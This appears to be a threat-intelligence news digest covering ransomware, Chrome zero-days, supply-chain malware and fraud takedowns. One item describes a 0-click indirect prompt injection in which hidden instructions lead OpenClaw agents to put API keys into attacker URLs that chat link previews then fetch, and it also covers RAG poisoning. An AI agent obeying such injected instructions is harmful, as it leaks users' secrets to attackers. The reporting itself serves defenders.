Current Events
The latest threat intelligence stories tracked by Mallory.
Today
Nevada Expands Zero Trust and Identity Modernization After Ransomware Attack
Nevada officials said a **major ransomware attack** prompted the state to accelerate cybersecurity and digital modernization efforts, with State CIO **Tim Galluzi** framing the incident as proof that resilience, workforce readiness, and governance must be built into daily operations rather than treated as one-time projects. The state subsequently secured unanimous legislative support and backing from the governor to invest in new cybersecurity tools and infrastructure intended to better protect resident data and critical government systems. Nevada's response emphasizes **zero trust architecture**, stronger **identity and access management**, and broader cross-agency coordination as part of a longer-term modernization strategy. Galluzi described identity as the "new firewall" in an environment where employees, partners, and residents increasingly access systems remotely, and he also highlighted workforce training as a core defensive measure alongside technology upgrades and improved service delivery.
OT Security Pushes Beyond CVSS for Risk Assessment
Operational technology security practitioners are increasingly arguing that **CVSS** is not an adequate way to measure risk in industrial environments, even after the release of **CVSS 4.0**. The reporting says OT defenders view traditional vulnerability severity scoring as poorly suited to environments where safety, uptime, physical process impact, and sector interdependencies matter more than the characteristics of an individual software flaw. Experts cited in the coverage say OT risk assessment needs to focus on **cascading consequences**, cross-sector dependencies, and consequence management rather than trying to refine a vulnerability-centric scoring model. The articles describe a broader shift in OT security thinking: instead of treating CVSS as a universal standard, organizations operating critical infrastructure are being urged to adopt methodologies that better reflect real-world operational impact and the administrative realities of industrial systems.
Lawmakers Seek Investigation Into Former CISA Acting Director's Polygraph and Clearance Handling
House Democrats asked the inspectors general for the intelligence community and the Department of Homeland Security to investigate allegations that former CISA Acting Director **Madhu Gottumukkala** bypassed intelligence access protocols after failing two polygraph examinations tied to entry into a highly sensitive controlled access program. The lawmakers' letter describes a July 2025 effort to obtain access to one of the government's most restricted intelligence compartments, where admission requires both a demonstrated need-to-know and a successful counterintelligence-scope polygraph. The request for an independent probe also cites alleged retaliation against career staff, security clearance suspensions, internal investigations, and possible violations of national security directives. Both reports describe the same developing oversight matter and frame it as a governance and security-clearance controversy inside **CISA**, with lawmakers questioning whether required escalation steps, including notification to the Office of the Director of National Intelligence, were ignored after the failed polygraphs.
Security Risks From OpenClaw ‘Sovereign’ AI Agents With Local Terminal Access
**OpenClaw** (formerly *Clawdbot/Moltbot*) is rapidly spreading as an open-source “sovereign agent” that runs locally and can be granted high-privilege access to a user’s machine (including terminal/code execution), shifting AI from a passive chatbot to an active operator on endpoints. Trend Micro warns this model materially expands the attack surface by combining agent **access to files/commands**, **untrusted inputs** (e.g., messages/web/email), and **exfiltration paths**, and adds a fourth compounding risk—**persistence** via retained memory/state—creating conditions where prompt/instruction manipulation could translate into real system actions and data loss. Adoption is accelerating in China, where Shenzhen’s Longgang district proposed subsidies and an ecosystem to support OpenClaw-driven “one-person companies,” even as regulators and state media flag **data security and privacy** concerns tied to the tool’s ability to access personal and enterprise data. The reporting notes OpenClaw’s plug-in model support (including OpenAI, Anthropic, and Chinese model providers) and highlights official scrutiny amid China’s tightened data-privacy and export-control posture, underscoring that the primary risk is not a single vulnerability but the **operational security implications of deploying locally empowered AI agents** at scale.
U.S. Water Utilities Face New Cybersecurity Funding and Regulatory Push
U.S. policymakers are advancing new cybersecurity measures for the **water and wastewater sector**, with separate federal and state initiatives aimed at improving defenses for under-resourced utilities. A bipartisan federal proposal, the **FLOWS Act**, would provide the Environmental Protection Agency with **$50 million annually** to help small and rural water systems modernize cybersecurity capabilities, digital monitoring, and operational technology support without requiring local cost sharing that often blocks access to federal aid. In New York, state officials finalized what they describe as **first-of-its-kind cyber mandates** for public water systems and paired them with a **$2.5 million grant program** to support risk assessments and security upgrades. The rules establish enforceable requirements for drinking water and wastewater operators to create formal cybersecurity programs, identify risks, and implement technical safeguards for operational systems, reflecting broader concern that the water sector remains a comparatively weak point in U.S. critical infrastructure security.
Operation Atlantic Targets Crypto Approval-Phishing Scams
Law enforcement agencies in the **U.S., U.K., and Canada** launched **Operation Atlantic** to disrupt cryptocurrency fraud schemes based on **approval phishing**, in which victims are tricked into authorizing malicious wallet permissions through fake alerts, pop-ups, or spoofed service messages. Once a victim approves access, attackers can drain assets from the wallet, and recovery is difficult because blockchain transactions are generally irreversible. Authorities said the campaign responds to a broader rise in crypto-enabled fraud, with Chainalysis estimating at least **$14 billion** in on-chain scam revenue in 2025 and warning the total could rise as more illicit wallets are identified. The operation builds on earlier anti-fraud efforts including **Project Atlas**, which identified more than **2,000 compromised wallets** across **14 countries**, disrupted roughly **$70 million** in potential fraud, and froze about **$24 million** in stolen cryptocurrency. The same threat pattern is reflected in phishing lures impersonating platforms such as **OpenSea**, where fake offer alerts, account verification notices, and token airdrop messages attempt to push users into connecting wallets to malicious sites. Those examples illustrate the social-engineering tactics now commonly used in approval-phishing campaigns, alongside increasingly sophisticated content and phishing-as-a-service infrastructure.
Handala Hack Destructive Intrusions Linked to Iran's MOIS
**Handala Hack**, a persona within the **Void Manticore** intrusion set also tracked as **Red Sandstorm** and **Banished Kitten**, has been conducting destructive cyberattacks against organizations in **Israel, Albania, and the United States**. The activity is attributed to Iran’s **Ministry of Intelligence and Security (MOIS)** and is characterized by operations designed to **destroy data rather than collect intelligence**. Check Point’s reporting says the group has operated through multiple personas, including **Handala Hack**, **Karma**, and **Homeland Justice**, with the latter previously used against Albanian government and telecom targets and Handala now appearing in more recent campaigns, including an intrusion affecting medical technology firm **Stryker**. The intrusions typically begin with **compromised VPN credentials**, after which the attackers use **RDP** for remote access, **NetBird** for peer-to-peer tunneling inside victim environments, and **multiple parallel wiping tools** to maximize damage and hinder recovery. Researchers also observed an **AI-assisted PowerShell script** in the wiping toolkit and noted weaker operational security than in earlier activity, including connections traced directly to **Iranian IP addresses** instead of commercial VPN infrastructure. A separate podcast reference aligns with the same incident by describing the attack on **Stryker** as a network disruption that wiped more than **200,000 resources**, reinforcing the destructive nature and scale of the campaign.
Meta Expands Anti-Scam Protections Across WhatsApp, Facebook, and Messenger
**Meta** introduced new anti-scam protections across *WhatsApp*, *Facebook*, and *Messenger* to counter fraud campaigns that rely on social engineering, impersonation, and malicious links. The updates include WhatsApp warnings when device-linking requests show scam-related behavioral signals, such as attempts to trick users into sharing linking codes or QR codes, and Facebook alerts for suspicious friend requests from accounts with indicators like recent creation or no mutual connections. Messenger is also adding AI-driven scam detection to identify patterns associated with impersonation and spoofed links in chats. The changes are part of a broader anti-fraud push in which Meta said it worked with international law enforcement to disable more than **150,000 scam-linked accounts** and support the arrest of **21 individuals**. A separate report on a new cross-industry anti-scam accord involving Meta, Google, Microsoft, Amazon, OpenAI, and others describes a wider effort to share threat intelligence, improve fraud reporting, strengthen transaction verification, and coordinate defenses against scam operations that move across multiple online platforms. A report on **Operation Atlantic** focuses instead on cryptocurrency approval-phishing enforcement by U.S., U.K., and Canadian authorities and is a different story from Meta's platform-specific product rollout.
CISA Adds Wing FTP Server Information Disclosure Flaw to KEV Catalog
**CISA** added **Wing FTP Server** vulnerability `CVE-2025-47813` to its **Known Exploited Vulnerabilities (KEV)** catalog, warning that the flaw is being actively exploited and requiring Federal Civilian Executive Branch agencies to remediate it by **March 30, 2026** under **BOD 22-01**. The issue affects Wing FTP Server versions prior to **7.4.4** and stems from improper handling of an overly long `UID` cookie in `loginok.html`, which can cause the server to disclose the application's full local installation path during web authentication. Although `CVE-2025-47813` is an **information disclosure** issue rather than a standalone remote code execution bug, reporting indicates it can support attacker reconnaissance and may be chained with other Wing FTP Server flaws in broader attack paths. The vendor patched the vulnerability in **May 2025** in version **7.4.4**, alongside **`CVE-2025-47812`** and **`CVE-2025-27889`**, and researcher **Julien Ahrens** previously published proof-of-concept details showing how the path disclosure could aid exploitation. Organizations using Wing FTP Server, not just federal agencies, should verify they are no longer running vulnerable versions and review exposure of web-based authentication components.
Indirect Prompt Injection and Data Exfiltration Risks in Enterprise AI Agents
Security researchers warned that **AI agents and retrieval-augmented generation (RAG) systems** can be turned into data-exfiltration channels when attackers poison inputs or embed malicious instructions in content the model is expected to process. One report described a **0-click indirect prompt injection** against *OpenClaw* agents in which hidden instructions cause the agent to generate an attacker-controlled URL containing sensitive data such as API keys or private conversations in query parameters; messaging platforms like *Telegram* or *Discord* can then automatically request that URL for link previews, silently delivering the data to the attacker. The same reporting noted concerns about insecure defaults that allow agents to browse, execute tasks, and access local files, expanding the blast radius of prompt-injection abuse. Related analysis highlighted that the same core weakness extends beyond standalone agents to **enterprise RAG deployments**, where the integrity of the knowledge base becomes part of the security boundary. If attackers can poison indexed documents in systems such as SharePoint or Confluence, they can manipulate retrieval results and influence model outputs, including security workflows and analyst guidance. Broader commentary on **agentic AI threat convergence** reinforced that prompt engineering is no longer just a productivity technique but an emerging exploit class, with adversaries using prompt injection and context manipulation against AI-enabled security operations. Together, the reporting shows that enterprise AI risk increasingly depends on controlling untrusted content, hardening agent permissions, and treating prompts, retrieved documents, and downstream integrations as attack surfaces.
Android 17 Feature Rumors and Pixel Notification Summaries
Google's upcoming **Android 17** release is being discussed through early beta builds, leaks, and hands-on coverage of new AI-assisted features. Reported changes include a broader visual redesign tied to *Material 3 Expressive*, possible blur-heavy interface elements, and additional privacy-focused updates expected to be highlighted during the platform's public rollout. Early testing by Google and device makers indicates the next Android version is already in active development ahead of a likely mid-year stable release. One reported capability is **AI-powered notification summaries** on supported Pixel devices, which condense long messages and display them on the lock screen using on-device processing. That feature appears consistent with the broader push toward AI enhancements in Android, but the hands-on report focuses on current Pixel functionality rather than the broader Android 17 leak cycle. The material is **not fluff** because it contains substantive product and platform details with security and privacy implications, even though it is not about a breach, exploit, or vulnerability disclosure.
AI Safety Concerns Around Copilot and ChatGPT Content Controls
Recent reporting highlights **AI safety and governance risks** in mainstream generative AI tools, with concerns spanning both enterprise and consumer use. Gartner warned that **Microsoft 365 Copilot** can amplify existing data exposure problems by making over-shared SharePoint and Microsoft 365 content easier to discover, and also flagged the risk of users distributing inaccurate or culturally inappropriate output without proper review. The guidance emphasized enabling Microsoft’s filters, tightening document permissions, and training users to validate generated content before sharing it. Separate reporting on **OpenAI’s ChatGPT** described internal opposition to expanded “adult mode” capabilities, with former safety personnel reportedly warning that age-gating and content controls were not reliable enough to prevent minors from accessing prohibited material. The article also cited prior filter failures that allegedly allowed graphic erotic content outside intended policy boundaries. Both reports point to a broader governance issue: organizations and platform providers are struggling to keep **content moderation, access controls, and user safeguards** aligned with rapidly expanding AI functionality.
Actively Exploited Browser Sandbox Escape in Microsoft Edge and Related Chromium Update
Microsoft Edge users were urged to update **Stable Channel** installations to version `146.0.3856.59` or later after **CVE-2026-3910** was disclosed as having an available exploit and being actively exploited in the wild. Advisory details indicate the flaw can allow **arbitrary code execution inside a sandbox** through a crafted HTML page, and additional Edge vulnerabilities may also enable **spoofing**, **remote code execution**, and **security restriction bypass**. HKCERT rated the Edge issue as **Extremely High Risk**, underscoring the urgency of patching. A separate advisory for **Google Chrome** addressed **CVE-2026-3909** in Chrome versions prior to `146.0.7680.80`, and CISA added that Chrome flaw to the **Known Exploited Vulnerabilities** catalog. Although both browser advisories were published the same day and concern actively exploited Chromium-based browser vulnerabilities, the Chrome item concerns a **different CVE and a different vendor advisory** and should be treated as a separate incident from the Edge-specific **CVE-2026-3910** disclosure.
Stryker Global Network Disruption Claimed by Iran-Linked Handala Hacktivists
U.S. medical device manufacturer **Stryker** reported a severe, global disruption to its Microsoft/Windows environment following a cyberattack that left employees unable to access corporate systems. Staff reported corporate laptops and phones being wiped, widespread outages of work applications and email, and some login pages displaying the **Handala** logo; the company also routed calls to an automated message citing a “building emergency.” Stryker said it is experiencing a “global network disruption,” believes the incident is contained, and stated it has **no indication of ransomware** while working to restore operations using business continuity measures. A pro-Iran hacktivist group calling itself **Handala** publicly claimed responsibility, framing the attack as retaliation tied to the U.S.-Iran conflict and citing a reported U.S. strike on a girls’ school in Tehran. The group alleged it wiped large numbers of systems and exfiltrated significant data, and reporting indicated at least partial corroboration of system wiping and defacement across Stryker’s global environment. The incident appears to have caused broad operational impact across Stryker’s international footprint, with claims and employee reports indicating both destructive activity (device/server wiping) and potential data theft, though Stryker’s public statement did not confirm exfiltration.
Intuitive Surgical Phishing Breach Exposed Customer and Employee Data
**Intuitive Surgical** disclosed that attackers gained access to internal business administrative systems after stealing an employee's credentials in a phishing attack. The intrusion exposed customer business and contact information, employee data, and corporate files, while the company said the incident did **not** affect operations, hospital customer networks, or its core robotic surgery and digital platforms, including **da Vinci** and **Ion** systems. Intuitive said its robotic systems operate independently from the compromised internal business network and that hospital environments remain separately managed. The company said it took immediate containment steps, launched an ongoing investigation, and notified data privacy regulators. Reporting also noted that Intuitive's network segmentation separated internal IT business systems, manufacturing operations, and digital products, which the company cited as the reason the breach did not spread into production or customer-facing clinical environments. Public details remain limited, including when the phishing attack occurred and when it was detected, but both reports indicate the incident was confined to internal business applications rather than operational or medical device infrastructure.
GlassWorm Supply-Chain Campaign Abuses Open VSX Extension Dependencies
**GlassWorm** expanded its software supply-chain campaign in the Open VSX ecosystem by publishing dozens of seemingly benign extensions that later pull in malicious components through the `extensionPack` and `extensionDependencies` manifest fields. Socket reported **73 malicious Open VSX extensions** linked to the operation, while another report cited **72** newly identified packages, reflecting the same campaign and detection set. The technique allows attackers to establish trust with an initial standalone-looking extension and then, in a later update, silently install a hidden GlassWorm loader as a transitive dependency, defeating one-time review of the original package. The malicious listings impersonate common developer tools including formatters, linters, language support packages, and AI coding assistants to maximize installation volume. The campaign preserves earlier **GlassWorm** tradecraft while improving evasion and resilience. Reported behaviors include staged JavaScript execution, **Russian locale/timezone geofencing**, use of **Solana transaction memos** as dead drops, and in-memory execution of follow-on code. Socket also observed infrastructure and loader changes, including reuse of `45[.]32[.]150[.]251`, addition of `45[.]32[.]151[.]157` and `70[.]34[.]242[.]255`, migration to a new Solana wallet, and a shift from a static AES-wrapped loader to heavier **RC4/base64/string-array obfuscation** with decryption material moved into HTTP response headers such as `ivbase64` and `secretkey`. This is a substantive threat-intelligence and vulnerability-exposure story, not fluff, because it documents an active malicious campaign, specific delivery mechanisms, and concrete infrastructure tied to developer-targeted compromise.
Google Patches Two Actively Exploited Chrome Zero-Days
Google released an urgent **Chrome stable channel** update to address two **high-severity zero-day vulnerabilities** that the company says are being **actively exploited in the wild**. The patched versions are `146.0.7680.75/76` for **Windows and macOS** and `146.0.7680.75` for **Linux**, with rollout occurring over days to weeks. The flaws were reported internally by Google on March 10, and Google said access to additional bug details may remain restricted until most users have updated. The two vulnerabilities are **CVE-2026-3909**, an **out-of-bounds write in Skia**, and **CVE-2026-3910**, an **inappropriate implementation in V8**. Both components are high-value targets because they sit in Chrome’s rendering and JavaScript execution paths, creating opportunities for malicious webpages to trigger memory corruption or unsafe browser behavior that could lead to **arbitrary code execution**. The update is a substantive security release rather than routine product news because Google explicitly confirmed that exploits exist for both issues, making rapid patching a priority for enterprises and end users.
INTERPOL Operation Synergia III Disrupts Global Phishing and Fraud Infrastructure
**INTERPOL** said **Operation Synergia III** led to the arrest of **94 suspects**, the seizure of **212 devices and servers**, and the sinkholing or takedown of more than **45,000 malicious IP addresses** tied to cybercrime infrastructure across **72 countries and territories**. The operation ran from July 2025 through January 2026 and targeted infrastructure supporting **phishing, malware, ransomware, romance scams, credit card fraud, and related online fraud**. Authorities said **110 additional individuals remain under investigation**, underscoring that follow-on enforcement activity is still ongoing. Preliminary case details show broad international participation and a focus on both technical infrastructure and fraud operators. In **Macau**, investigators identified more than **33,000 phishing and fraudulent websites**, including fake casino, banking, government, payment, and other critical-service sites used to steal credentials and payment data. In **Bangladesh**, authorities arrested **40 suspects** and seized **134 devices** linked to loan scams, employment scams, identity theft, and credit card fraud, while in **Togo** police arrested **10 suspects** tied to a fraud ring whose members split responsibilities between account compromise and social-engineering schemes such as romance and sextortion scams. The reporting describes a coordinated law-enforcement disruption of active criminal infrastructure rather than a vendor announcement or generic security guidance.
Chinese Espionage Campaign Targets Southeast Asian Militaries With AppleChris and MemFun
A **China-linked cyber espionage campaign** targeted military organizations in Southeast Asia, with Palo Alto Networks Unit 42 tracking the activity as **CL-STA-1087**. The operation reportedly dates back to at least 2020 and focused on **high-value intelligence collection** rather than broad data theft, including files related to military capabilities, organizational structures, official meeting records, and cooperation with Western armed forces. Researchers said the campaign showed the hallmarks of a patient, state-backed intrusion set, including tailored delivery, defense evasion, stable infrastructure, and custom malware used to maintain long-term access. The attackers used backdoors identified as **AppleChris** and **MemFun**, along with a credential harvester called **Getpass**. Unit 42 observed suspicious **PowerShell** activity that slept for six hours before establishing reverse shells to attacker-controlled C2 infrastructure, after which AppleChris variants were deployed across endpoints following lateral movement to preserve persistence and reduce detection. One additional reference briefly mentions **Chinese-nexus operators** pivoting rapidly against regional targets using conflict-themed lures, but the rest of the material is unrelated newsletter, opinion, podcast, or best-practice content rather than reporting on the same espionage operation.
Coruna iPhone Exploit Kit Linked to Russian Espionage and Criminal Use
Researchers reported that the **Coruna** iOS exploitation framework contains full exploit chains and roughly **23 exploits** targeting iPhones running **iOS 13 through 17.2/17.2.1**, and that it has been used by multiple threat actors, including **UNC6353**, a suspected Russian espionage group conducting watering-hole attacks against Ukrainian users, and **UNC6691**, a financially motivated China-based actor. The toolkit, also referred to as **CryptoWaters**, has been described as a rare case of **nation-state-grade iPhone exploitation** appearing in broader criminal operations, with post-exploitation activity including the **PLASMAGRID** payload and persistence through a process identified as `com.apple.assistd` that injects into the `powerd` daemon running as root. Reporting also highlighted competing views on the toolkit's origin. One account said evidence suggests parts of Coruna may have originated from **Trenchant**, a hacking and surveillance division of **L3Harris**, and later leaked into the wider ecosystem, ultimately reaching foreign intelligence services and cybercriminals. However, technical threat research noted that the **definitive origin remains unconfirmed**, even as analysts observed reuse of vulnerabilities associated with **Operation Triangulation** and CISA added **`CVE-2023-41974`** to the **Known Exploited Vulnerabilities** catalog after Google's publication. The story is substantive threat intelligence, not fluff, because it concerns an active exploit framework, real-world exploitation, and possible proliferation of advanced offensive capabilities.
AI-Enabled Fraud Scams Industrialized by Transnational Criminal Networks
**Transnational criminal networks** are increasingly industrializing online fraud with **AI-enabled social engineering**, according to reporting on scam compounds in Southeast Asia, an Interpol assessment, and policy commentary tied to a new US executive order. Fraud operations linked to *pig-butchering* and romance scams are using generative AI to improve language quality, deepfakes to impersonate trusted people, and low-cost "deepfake-as-a-service" offerings to scale deception. Interpol said AI-assisted fraud is **4.5 times more profitable** than non-AI schemes, while broader reporting describes these operations as structured, multinational enterprises that function like businesses and increasingly rely on automation, synthetic identities, and persuasive impersonation at scale. Reporting from Cambodia and the wider region shows scam operators are now recruiting "**AI face models**" to appear on high-volume deepfake video calls, including applicants from multiple countries seeking work in compounds associated with trafficking-linked fraud operations. The same ecosystem has been described as part of a broader organized-crime model involving forced labor, cryptocurrency investment scams, romance fraud, and impersonation schemes targeting victims globally. One reference on calculating AI ROI in enterprise cybersecurity is **not about this fraud campaign ecosystem**, and an EU sanctions announcement concerns separate state-linked cyber incidents rather than financially motivated AI-enabled fraud.
Olympic Cybersecurity Lessons and Incident Response Preparedness
Coverage focused on **cybersecurity lessons from major sporting events**, especially the Olympics, with emphasis on how organizers prepared for and responded to threats surrounding **Paris 2024** and **Milan Cortina 2026**. The substantive reporting describes the Olympics as a high-value target for phishing, malware, spoofed domains, DDoS, hacktivism, and state-backed activity, and notes that Italian authorities said they blocked attacks targeting foreign ministry offices, Olympics websites, and hotels in the Cortina d'Ampezzo area before the 2026 Games opened. The material is largely **feature and interview content** rather than a single breaking incident, but it contains relevant operational detail about defending large public events through coordination across agencies, partners, and sponsors, and through mature **risk management** and **incident response** programs. One reference is not part of this story because it is a general weekly news roundup covering unrelated issues such as Chrome zero-days, router botnets, and an AWS breach, rather than Olympic event security.
FBI Investigates Malware-Laced Games Distributed on Steam
The **FBI** is seeking victims as it investigates a suspected cybercriminal who published multiple **malware-tainted games** on **Steam**, using seemingly legitimate titles as Trojan horses to infect players' systems. The games named by the agency include **BlockBlasters/BlockBasters, Chemia, Dashverse/DashFPS, Lampy, Lunara, PirateFi, and Tokenova**, and were reportedly available between **2024 and 2026**. Both reports indicate the titles were functional enough to appear legitimate, but were designed to deliver malware and compromise users after installation. The reported impact includes **account compromise, information theft, and crypto-wallet draining**, with one cited case involving the theft of **$32,000 in cancer donations** from a streamer after exposure to one of the malicious games. The investigation suggests the listed titles may have been developed by the **same threat actor**, and that the number of affected users remains unknown. The case also highlights ongoing weaknesses in marketplace screening, as malicious games were able to reach Steam users before being removed by **Valve**.
